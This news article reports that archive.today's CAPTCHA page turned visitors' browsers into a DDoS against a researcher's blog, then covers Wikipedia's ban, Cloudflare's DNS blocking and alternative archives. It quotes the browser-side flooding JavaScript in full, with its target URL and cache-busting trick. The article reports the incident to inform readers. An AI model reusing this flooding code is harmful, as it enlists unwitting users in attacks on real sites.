Cloudflare flagged archive.today as “C&C/Botnet” and stopped resolving it via its 1.1.1.2 DNS service this month, the latest escalation in a controversy that began when the popular web archiving service weaponized its visitors’ browsers to launch a distributed denial-of-service attack against security researcher Jani Patokallio’s blog starting January 11, 2026. The attack used JavaScript embedded in archive.today’s CAPTCHA page to turn unsuspecting visitors into unwitting DDoS participants, firing requests every 300 milliseconds. Wikipedia punished the dual breach with a full ban on February 20, removing over 695,000 archive.today links from the site.
Archive.today’s operator didn’t just weaponize users—Wikipedia editors discovered the service had manipulated archived content by inserting Patokallio’s name into preserved pages, destroying the trust that made archive.today valuable to developers, journalists, and researchers in the first place.
Weaponizing Visitors: The JavaScript DDoS Attack
Archive.today injected malicious JavaScript into its CAPTCHA page that executed every 300 milliseconds on each visitor’s browser, sending randomized requests to Patokallio’s blog without user knowledge or consent. The code appeared at line 136 of the CAPTCHA HTML and used “no-cors” mode to bypass browser security checks:
setInterval(function() {
fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 300);With thousands of daily visitors, this turned archive.today users into an involuntary botnet generating 3-4 requests per second each. Random search parameters prevented caching, forcing server computation on every request. Browser CORS protections couldn’t stop simple GET requests, highlighting how trivially websites can weaponize visitors. uBlock Origin successfully blocks these requests, but most users had no idea they were participating in a DDoS attack for over two months.
From Investigation to Retaliation
The DDoS attack was retaliation for Patokallio’s August 2023 investigation titled “archive.today: On the trail of the mysterious guerrilla archivist of the Internet,” which used open-source intelligence to examine the service’s ownership and funding. The anonymous operator responded with escalating demands: GDPR complaints filed under the name “Nora,” polite removal requests, then hostile threats including references to AI-generated pornography.
The timeline reveals a vendetta, not a dispute. Following the November 2025 FBI subpoena against archive.today’s registrar—which gained attention partly due to Patokallio’s investigation—the operator shifted from legal complaints to technical retaliation. Consequently, the DDoS attack started January 11, 2026, three days after a GDPR complaint failed to force post removal. Moreover, by January 25, “Nora” sent escalating threats to Patokallio.
This is what happens when critical internet infrastructure operates with zero accountability. No board, no oversight, no transparency—just one anonymous operator who prioritized silencing criticism over the service’s preservation mission.
Content Manipulation Destroys Trust
Wikipedia didn’t just ban archive.today for the DDoS attack. Editors discovered the operator had manipulated archived content by inserting Patokallio’s name into preserved web pages—a second trust breach that obliterated the service’s core value proposition. On February 20, 2026, Wikipedia blacklisted all archive.today links, affecting 695,000+ citations across 400,000 pages.
A service that manipulates the content it claims to preserve cannot be trusted as a citation source. That’s the conclusion from Wikipedia’s Request for Comment, which cited both weaponizing visitor browsers and tampering with archived pages as violations too severe to overlook. Citation templates stopped rendering archive.today URLs as of February 28, creating cascading citation failures across the web—academic papers, legal briefs, and journalism now point to broken or blocked URLs.
The irony is brutal: an archiving service destroyed by its own operator’s actions. The ONE job archive.today had was authentic preservation, and it failed spectacularly.
DNS-Level Blocking Raises Questions
Cloudflare’s 1.1.1.2 (malware-blocking DNS) now flags archive.today domains with “C&C/Botnet” and “DNS Tunneling” errors, returning 0.0.0.0 with status “Censored.” The distinction matters: Cloudflare’s unfiltered 1.1.1.1 DNS service still resolves archive.today as of latest reports, highlighting the difference between the company’s filtered and unfiltered offerings.
The Hacker News community split sharply (328 points, 237 comments) on whether this represents legitimate security or infrastructure censorship. Cloudflare is protecting users from being weaponized—a defensible security decision. However, it’s also making unilateral choices about what content is accessible, which raises concerns about DNS provider power.
DNS-level blocking sets a precedent. Infrastructure providers are now content judges, deciding which services deserve resolution. Furthermore, the debate isn’t settled: some developers praised Cloudflare for security, while others warned about “DNS censorship” and questioned what else gets filtered without transparency. Additionally, Southern California and Finnish users reported access issues to Patokallio’s blog itself, suggesting archive.today’s DDoS defenses became indiscriminate collateral damage.
Where Developers Should Go Now
With archive.today blocked and banned, developers need alternatives. No single service offers archive.today’s combination of speed, paywall bypass, and domain redundancy, but three options cover most use cases:
Archive.org (Wayback Machine) remains the most comprehensive option—866+ billion pages archived, nonprofit governance (Internet Archive), and trustworthy preservation. Trade-offs: slower crawl-based snapshots instead of instant archives, and paywalls often work against it. Use this for long-term preservation and trusted citations.
Perma.cc was built by Harvard Law School for citation stability in academic and legal work. Free tier offers 10 links per month, with unlimited access at $100/year for organizations. No paywall bypass, but permanent URLs backed by institutional trust. Ideal for professional citations requiring authenticity guarantees.
GhostArchive offers a free, similar interface to archive.today but lacks the established trust and archive size. Use it for quick snapshots while the ecosystem stabilizes, but verify critical archives elsewhere.
Memento Time Travel searches across multiple archives simultaneously—enter a URL and date, and it finds the closest archived version across Wayback Machine, national libraries, and other services. Doesn’t create new archives, but excellent for finding existing snapshots.
The web archiving community is reconsidering centralization risks. Self-hosted solutions like ArchiveBox are gaining interest as developers realize that trusting anonymous services for critical preservation creates single points of failure—and ethics violations.
Key Takeaways
- Archive.today weaponized users via JavaScript DDoS code running every 300ms in CAPTCHA pages, turning visitors into unwitting attack participants without consent—a fundamental trust breach
- Content manipulation sealed its fate—Wikipedia discovered archive.today edited archived pages to insert the targeted researcher’s name, destroying the authenticity preservation services require
- 695,000+ Wikipedia links broken creates cascading citation failures across academic papers, legal briefs, and journalism that relied on archive.today for stable references
- Cloudflare’s DNS blocking raises infrastructure questions—protecting users from weaponization is defensible security, but unilateral DNS-level decisions blur the line between infrastructure and content moderation
- Switch to Archive.org for trustworthy preservation, Perma.cc for professional citations, or explore self-hosted ArchiveBox to avoid centralization risks
- Anonymous services lack accountability—when archive.today’s operator faced criticism, personal vendetta trumped the service’s mission, proving critical infrastructure needs transparent governance
